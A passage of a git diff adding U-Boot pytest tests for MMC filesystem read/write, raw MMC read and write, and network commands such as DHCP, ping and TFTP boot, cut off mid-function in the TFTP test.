output + + alignment = int( + u_boot_console.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset = random.randrange(alignment, 1024, alignment) + output = u_boot_console.run_command( + '%sload mmc %d:%s %x %s' % (fs, x, part, addr + offset, file) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext4') +def test_mmc_ext4ls(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + u_boot_console.run_command('mmc dev %d' % x) + for part in partitions: + output = u_boot_console.run_command('%sls mmc %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_ext4load_ext4write(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + devices[x]['addr_%d' % part] = addr + size = random.randint(4, 1 * 1024 * 1024) + devices[x]['size_%d' % part] = size + # count CRC32 + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + devices[x]['expected_crc32_%d' % part] = expected_crc32 + # do write + + file = '%s_%d' % ('uboot_test', size) + devices[x]['file_%d' % part] = file + output = u_boot_console.run_command( + '%swrite mmc %d:%s %x /%s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + '%sload mmc %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext2') +def test_mmc_ext2ls(u_boot_console): + if not mmc_set_up: 
+ pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = u_boot_console.run_command('%sls mmc %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext2') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_ext2load(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = devices[x]['size_%d' % part] + expected_crc32 = devices[x]['expected_crc32_%d' % part] + file = devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + '%sload mmc %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_ls(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = u_boot_console.run_command('ls mmc %d:%s' % (x, part)) + if re.search(r'No \w+ table on this device', output): + pytest.fail( + '%s: Partition table not found %d' % (fs.upper(), x) + ) + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_load(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = devices[x]['size_%d' % part] + expected_crc32 = devices[x]['expected_crc32_%d' % part] + file 
= devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + 'load mmc %d:%s %x /%s' % (x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_save(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = 0 + file = devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + 'save mmc %d:%s %x /%s %d' + % (x, part, addr + offset, file, size) + ) + expected_text = '%d bytes written' % size + assert expected_text in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_fat_read_write_files(u_boot_console): + test_mmc_list(u_boot_console) + test_mmc_dev(u_boot_console) + test_mmcinfo(u_boot_console) + test_mmc_part(u_boot_console) + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + + # Number of files to be written/read in MMC card + num_files = 100 + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + count_f = 0 + addr_l = [] + size_l = [] + file_l = [] + crc32_l = [] + offset_l = [] + addr_l.append(addr) + + while count_f < num_files: + size_l.append(random.randint(4, 1 * 1024 * 1024)) + + # CRC32 count + output = u_boot_console.run_command( + 'crc32 %x %x' % (addr_l[count_f], size_l[count_f]) + ) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + crc32_l.append(m.group(1)) + + # Write operation + file_l.append('%s_%d_%d' % ('uboot_test', count_f, size_l[count_f])) + output = u_boot_console.run_command( + '%swrite mmc %d:%s %x %s %x' + % ( + fs, + x, + part, + addr_l[count_f], + file_l[count_f], + size_l[count_f], + ) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size_l[count_f] + assert expected_text in output + + addr_l.append(addr_l[count_f] + size_l[count_f] + 1048576) + count_f += 1 + + count_f = 0 + while count_f < num_files: + alignment = int( + u_boot_console.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset_l.append(random.randrange(alignment, 1024, alignment)) + + # Read operation + output = u_boot_console.run_command( + '%sload mmc %d:%s %x %s' + % ( + fs, + x, + part, + addr_l[count_f] + 
offset_l[count_f], + file_l[count_f], + ) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size_l[count_f] + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr_l[count_f] + offset_l[count_f]) + ) + assert crc32_l[count_f] in output + + count_f += 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) diff --git a/test/py/tests/test_mmc_rd.py b/test/py/tests/test_mmc_rd.py new file mode 100644 index 00000000000..ea652f91361 --- /dev/null +++ b/test/py/tests/test_mmc_rd.py @@ -0,0 +1,286 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "mmc read" command. The test reads data from the eMMC or SD +# card, and validates the no errors occurred, and that the expected data was +# read if the test configuration contains a CRC of the expected data. + +import pytest +import time +import u_boot_utils + +""" +This test relies on boardenv_* to containing configuration values to define +which MMC devices should be tested. For example: + +# Configuration data for test_mmc_dev, test_mmc_rescan, test_mmc_info; defines +# whole MMC devices that mmc dev/rescan/info commands may operate upon. +env__mmc_dev_configs = ( + { + 'fixture_id': 'emmc-boot0', + 'is_emmc': True, + 'devid': 0, + 'partid': 1, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'emmc-boot1', + 'is_emmc': True, + 'devid': 0, + 'partid': 2, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'emmc-data', + 'is_emmc': True, + 'devid': 0, + 'partid': 0, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'sd', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, +) + +# Configuration data for test_mmc_rd; defines regions of the MMC (entire +# devices, or ranges of sectors) which can be read: +env__mmc_rd_configs = ( + { + 'fixture_id': 'emmc-boot0', + 'is_emmc': True, + 'devid': 0, + 'partid': 1, + 'sector': 0x10, + 'count': 1, + }, + { + 'fixture_id': 'emmc-boot1', + 'is_emmc': True, + 'devid': 0, + 'partid': 2, + 'sector': 0x10, + 'count': 1, + }, + { + 'fixture_id': 'emmc-data', + 'is_emmc': True, + 'devid': 0, + 'partid': 0, + 'sector': 0x10, + 'count': 0x1000, + }, + { + 'fixture_id': 'sd-mbr', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'sector': 0, + 'count': 1, + 'crc32': '8f6ecf0d', + }, + { + 'fixture_id': 'sd-large', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'sector': 0x10, + 'count': 0x1000, + }, +) +""" + +def mmc_dev(u_boot_console, is_emmc, devid, partid): + """Run the "mmc dev" command. + + Args: + u_boot_console: A U-Boot console connection. + is_emmc: Whether the device is eMMC + devid: Device ID + partid: Partition ID + + Returns: + Nothing. 
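A minimal illustration of what the helper above ends up sending, using the hypothetical 'emmc-boot0' entry from the example configuration (devid 0, eMMC hardware partition 1); none of these values describe a real board:

    # is_emmc=True, devid=0, partid=1 -> select boot partition 1 of mmc 0
    cmd = 'mmc dev 0 1'
    # the console reply must contain:
    good_response = 'mmc0(part 1) is current device'

For an SD-card entry (is_emmc False) the partition argument is dropped and the expected reply is simply 'mmc1 is current device'.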
+ """ + + # Select MMC device + cmd = 'mmc dev %d' % devid + if is_emmc: + cmd += ' %d' % partid + response = u_boot_console.run_command(cmd) + assert 'no card present' not in response + if is_emmc: + partid_response = '(part %d)' % partid + else: + partid_response = '' + good_response = 'mmc%d%s is current device' % (devid, partid_response) + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_dev(u_boot_console, env__mmc_dev_config): + """Test the "mmc dev" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + + # Select MMC device + mmc_dev(u_boot_console, is_emmc, devid, partid) + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rescan(u_boot_console, env__mmc_dev_config): + """Test the "mmc rescan" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + + # Select MMC device + mmc_dev(u_boot_console, is_emmc, devid, partid) + + # Rescan MMC device + cmd = 'mmc rescan' + response = u_boot_console.run_command(cmd) + assert 'no card present' not in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_info(u_boot_console, env__mmc_dev_config): + """Test the "mmc info" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + info_device = env__mmc_dev_config['info_device'] + info_speed = env__mmc_dev_config['info_speed'] + info_mode = env__mmc_dev_config['info_mode'] + info_buswidth = env__mmc_dev_config['info_buswidth'] + + # Select MMC device + mmc_dev(u_boot_console, is_emmc, devid, partid) + + # Read MMC device information + cmd = 'mmc info' + response = u_boot_console.run_command(cmd) + good_response = "Device: %s" % info_device + assert good_response in response + good_response = "Bus Speed: %s" % info_speed + assert good_response in response + good_response = "Mode: %s" % info_mode + assert good_response in response + good_response = "Bus Width: %s" % info_buswidth + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rd(u_boot_console, env__mmc_rd_config): + """Test the "mmc read" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_rd_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. 
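As a sketch of the full check performed when a 'crc32' value is configured, assuming the hypothetical 'sd-mbr' entry above and an illustrative RAM base of 0x10000000 (neither tied to a real board):

    u_boot_console.run_command('mw.b 0x10000000 0 0x200')    # scrub one sector of RAM
    out = u_boot_console.run_command('crc32 0x10000000 0x200')
    assert '8f6ecf0d' not in out                              # RAM must not already match
    u_boot_console.run_command('mmc read 0x10000000 0 1')     # read sector 0
    out = u_boot_console.run_command('crc32 0x10000000 0x200')
    assert '8f6ecf0d' in out                                  # data now matches the expected CRC

The scrub step only happens when both CONFIG_CMD_MEMORY and CONFIG_CMD_CRC32 are enabled; otherwise the test logs a warning and relies on the final CRC check alone.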
+ """ + + is_emmc = env__mmc_rd_config['is_emmc'] + devid = env__mmc_rd_config['devid'] + partid = env__mmc_rd_config.get('partid', 0) + sector = env__mmc_rd_config.get('sector', 0) + count_sectors = env__mmc_rd_config.get('count', 1) + expected_crc32 = env__mmc_rd_config.get('crc32', None) + read_duration_max = env__mmc_rd_config.get('read_duration_max', 0) + + count_bytes = count_sectors * 512 + bcfg = u_boot_console.config.buildconfig + has_cmd_memory = bcfg.get('config_cmd_memory', 'n') == 'y' + has_cmd_crc32 = bcfg.get('config_cmd_crc32', 'n') == 'y' + ram_base = u_boot_utils.find_ram_base(u_boot_console) + addr = '0x%08x' % ram_base + + # Select MMC device + mmc_dev(u_boot_console, is_emmc, devid, partid) + + # Clear target RAM + if expected_crc32: + if has_cmd_memory and has_cmd_crc32: + cmd = 'mw.b %s 0 0x%x' % (addr, count_bytes) + u_boot_console.run_command(cmd) + + cmd = 'crc32 %s 0x%x' % (addr, count_bytes) + response = u_boot_console.run_command(cmd) + assert expected_crc32 not in response + else: + u_boot_console.log.warning( + 'CONFIG_CMD_MEMORY or CONFIG_CMD_CRC32 != y: Skipping RAM clear') + + # Read data + cmd = 'mmc read %s %x %x' % (addr, sector, count_sectors) + tstart = time.time() + response = u_boot_console.run_command(cmd) + tend = time.time() + good_response = 'MMC read: dev # %d, block # %d, count %d ... %d blocks read: OK' % ( + devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Check target RAM + if expected_crc32: + if has_cmd_crc32: + cmd = 'crc32 %s 0x%x' % (addr, count_bytes) + response = u_boot_console.run_command(cmd) + assert expected_crc32 in response + else: + u_boot_console.log.warning('CONFIG_CMD_CRC32 != y: Skipping check') + + # Check if the command did not take too long + if read_duration_max: + elapsed = tend - tstart + u_boot_console.log.info('Reading %d bytes took %f seconds' % + (count_bytes, elapsed)) + assert elapsed <= (read_duration_max - 0.01) diff --git a/test/py/tests/test_mmc_wr.py b/test/py/tests/test_mmc_wr.py new file mode 100644 index 00000000000..05e5c1ee85d --- /dev/null +++ b/test/py/tests/test_mmc_wr.py @@ -0,0 +1,105 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2019, Texas Instrument +# Author: Jean-Jacques Hiblot <jjhiblot@ti.com> + +# Test U-Boot's "mmc write" command. The test generates random data, writes it +# to the eMMC or SD card, then reads it back and performs a comparison. + +import pytest +import u_boot_utils + +""" +This test relies on boardenv_* to containing configuration values to define +which MMC devices should be tested. For example: + +env__mmc_wr_configs = ( + { + "fixture_id": "emmc-boot0", + "is_emmc": True, + "devid": 1, + "partid": 1, + "sector": 0x10, + "count": 100, + "test_iterations": 50, + }, + { + "fixture_id": "emmc-boot1", + "is_emmc": True, + "devid": 1, + "partid": 2, + "sector": 0x10, + "count": 100, + "test_iterations": 50, + }, +) + +""" + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_random') +def test_mmc_wr(u_boot_console, env__mmc_wr_config): + """Test the "mmc write" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_wr_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. 
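A rough sketch of the buffer layout the test uses, assuming the hypothetical 'emmc-boot0' entry above (count 100 sectors) and an illustrative RAM base of 0x10000000:

    count_bytes = 100 * 512                             # 0xc800
    src_addr = '0x%08x' % 0x10000000                    # filled by 'random'
    dst_addr = '0x%08x' % (0x10000000 + count_bytes)    # 'mmc read' lands here
    # 'cmp.b <src> <dst> c800' must then report every byte identical

Placing the read-back buffer immediately after the source buffer means a single find_ram_base() result is enough for both.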
+ """ + + is_emmc = env__mmc_wr_config['is_emmc'] + devid = env__mmc_wr_config['devid'] + partid = env__mmc_wr_config.get('partid', 0) + sector = env__mmc_wr_config.get('sector', 0) + count_sectors = env__mmc_wr_config.get('count', 1) + test_iterations = env__mmc_wr_config.get('test_iterations', 1) + + + count_bytes = count_sectors * 512 + bcfg = u_boot_console.config.buildconfig + ram_base = u_boot_utils.find_ram_base(u_boot_console) + src_addr = '0x%08x' % ram_base + dst_addr = '0x%08x' % (ram_base + count_bytes) + + + for i in range(test_iterations): + # Generate random data + cmd = 'random %s %x' % (src_addr, count_bytes) + response = u_boot_console.run_command(cmd) + good_response = '%d bytes filled with random data' % (count_bytes) + assert good_response in response + + # Select MMC device + cmd = 'mmc dev %d' % devid + if is_emmc: + cmd += ' %d' % partid + response = u_boot_console.run_command(cmd) + assert 'no card present' not in response + if is_emmc: + partid_response = "(part %d)" % partid + else: + partid_response = "" + good_response = 'mmc%d%s is current device' % (devid, partid_response) + assert good_response in response + + # Write data + cmd = 'mmc write %s %x %x' % (src_addr, sector, count_sectors) + response = u_boot_console.run_command(cmd) + good_response = 'MMC write: dev # %d, block # %d, count %d ... %d blocks written: OK' % (devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Read data + cmd = 'mmc read %s %x %x' % (dst_addr, sector, count_sectors) + response = u_boot_console.run_command(cmd) + good_response = 'MMC read: dev # %d, block # %d, count %d ... %d blocks read: OK' % (devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Compare src and dst data + cmd = 'cmp.b %s %s %x' % (src_addr, dst_addr, count_bytes) + response = u_boot_console.run_command(cmd) + good_response = 'Total of %d byte(s) were the same' % (count_bytes) + assert good_response in response diff --git a/test/py/tests/test_net.py b/test/py/tests/test_net.py new file mode 100644 index 00000000000..038a473b239 --- /dev/null +++ b/test/py/tests/test_net.py @@ -0,0 +1,459 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# Test various network-related functionality, such as the dhcp, ping, and +# tftpboot commands. + +import pytest +import u_boot_utils +import uuid +import datetime +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, this test +will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# False or omitted if a DHCP server is attached to the network, and dhcp abort +# case should be tested. +# If DHCP abort testing is not possible or desired, set this variable to True. 
+# For example: On some setup, dhcp is too fast and this case may not work. +env__dhcp_abort_test_skip = True + +# True if a DHCPv6 server is attached to the network, and should be tested. +# If DHCPv6 testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp6_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +env__net_tftp_readable_file = { + 'fn': 'ubtest-readable.bin', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', + 'timeout': 50000, + 'fnu': 'ubtest-upload.bin', +} + +# Details regarding a file that may be read from a NFS server. This variable +# may be omitted or set to None if NFS testing is not possible or desired. +env__net_nfs_readable_file = { + 'fn': 'ubtest-readable.bin', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', +} + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if PXE testing is not possible or desired. +env__net_pxe_readable_file = { + 'fn': 'default', + 'addr': 0x2000000, + 'size': 74, + 'timeout': 50000, + 'pattern': 'Linux', +} + +# True if a router advertisement service is connected to the network, and should +# be tested. If router advertisement testing is not possible or desired, this +variable may be omitted or set to False. +env__router_on_net = True +""" + +net_set_up = False +net6_set_up = False + +def test_net_pre_commands(u_boot_console): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment at the + beginning of this file. + """ + + init_usb = u_boot_console.config.env.get('env__net_uses_usb', False) + if init_usb: + u_boot_console.run_command('usb start') + + init_pci = u_boot_console.config.env.get('env__net_uses_pci', False) + if init_pci: + u_boot_console.run_command('pci enum') + + u_boot_console.run_command('net list') + +@pytest.mark.buildconfigspec('cmd_dhcp') +def test_net_dhcp(u_boot_console): + """Test the dhcp command. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = u_boot_console.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No DHCP server available') + + u_boot_console.run_command('setenv autoload no') + output = u_boot_console.run_command('dhcp') + assert 'DHCP client bound to address ' in output + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('cmd_mii') +def test_net_dhcp_abort(u_boot_console): + """Test the dhcp command by pressing ctrl+c in the middle of dhcp request + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. 
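The abort case is opt-in: it only runs when the boardenv explicitly clears the skip flag, and it resets the PHY (via 'mii modify') right before issuing 'dhcp' so that auto-negotiation has to rerun, giving a window in which Ctrl-C can interrupt the exchange. A hypothetical boardenv_* snippet that enables it might look like:

    env__net_dhcp_server = True         # a DHCP server is on the test network
    env__dhcp_abort_test_skip = False   # the default is to skip this test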
+ """ + + test_dhcp = u_boot_console.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No DHCP server available') + + if u_boot_console.config.env.get('env__dhcp_abort_test_skip', True): + pytest.skip('DHCP abort test is not enabled!') + + u_boot_console.run_command('setenv autoload no') + + # Phy reset before running dhcp command + output = u_boot_console.run_command('mii device') + if not re.search(r"Current device: '(.+?)'", output): + pytest.skip('PHY device does not exist!') + eth_num = re.search(r"Current device: '(.+?)'", output).groups()[0] + u_boot_console.run_command(f'mii device {eth_num}') + output = u_boot_console.run_command('mii info') + eth_addr = hex(int(re.search(r'PHY (.+?):', output).groups()[0], 16)) + u_boot_console.run_command(f'mii modify {eth_addr} 0 0x8000 0x8000') + + u_boot_console.run_command('dhcp', wait_for_prompt=False) + try: + u_boot_console.wait_for('Waiting for PHY auto negotiation to complete') + except: + pytest.skip('Timeout waiting for PHY auto negotiation to complete') + + u_boot_console.wait_for('done') + + try: + # Sending Ctrl-C + output = u_boot_console.run_command( + chr(3), wait_for_echo=False, send_nl=False + ) + assert 'TIMEOUT' not in output + assert 'DHCP client bound to address ' not in output + assert 'Abort' in output + finally: + # Provide a time to recover from Abort - if it is not performed + # There is message like: ethernet@ff0e0000: No link. + u_boot_console.run_command('sleep 1') + # Run the dhcp test to setup the network configuration + test_net_dhcp(u_boot_console) + +@pytest.mark.buildconfigspec('cmd_dhcp6') +def test_net_dhcp6(u_boot_console): + """Test the dhcp6 command. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp6 = u_boot_console.config.env.get('env__net_dhcp6_server', False) + if not test_dhcp6: + pytest.skip('No DHCP6 server available') + + u_boot_console.run_command('setenv autoload no') + output = u_boot_console.run_command('dhcp6') + assert 'DHCP6 client bound to ' in output + + global net6_set_up + net6_set_up = True + +@pytest.mark.buildconfigspec('net') +def test_net_setup_static(u_boot_console): + """Set up a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + env_vars = u_boot_console.config.env.get('env__net_static_env_vars', None) + if not env_vars: + pytest.skip('No static network configuration is defined') + + for (var, val) in env_vars: + u_boot_console.run_command('setenv %s %s' % (var, val)) + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('cmd_ping') +def test_net_ping(u_boot_console): + """Test the ping command. + + The $serverip (as set up by either test_net_dhcp or test_net_setup_static) + is pinged. The test validates that the host is alive, as reported by the + ping command's output. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + output = u_boot_console.run_command('ping $serverip') + assert 'is alive' in output + +@pytest.mark.buildconfigspec('IPV6_ROUTER_DISCOVERY') +def test_net_network_discovery(u_boot_console): + """Test the network discovery feature of IPv6. + + An IPv6 network command (ping6 in this case) is run to make U-Boot send a + router solicitation packet, receive a router advertisement message, and + parse it. + A router advertisement service needs to be running for this test to succeed. 
+ U-Boot receives the RA, processes it, and if successful, assigns the gateway + IP and prefix length. + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + router_on_net = u_boot_console.config.env.get('env__router_on_net', False) + if not router_on_net: + pytest.skip('No router on network') + + fake_host_ip = 'fe80::215:5dff:fef6:2ec6' + output = u_boot_console.run_command('ping6 ' + fake_host_ip) + assert 'ROUTER SOLICITATION 1' in output + assert 'Set gatewayip6:' in output + assert '0000:0000:0000:0000:0000:0000:0000:0000' not in output + +@pytest.mark.buildconfigspec('cmd_net') +def test_net_tftpboot(u_boot_console): + """Test the tftpboot command. + + A file is downloaded from the TFTP server, its size and optionally its + CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + f = u_boot_console.config.env.get('env__net_tftp_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + addr = f.get('addr', None) + + fn = f['fn'] + if not addr: + output = u_boot_console.run_command('tftpboot %s' % (fn)) + 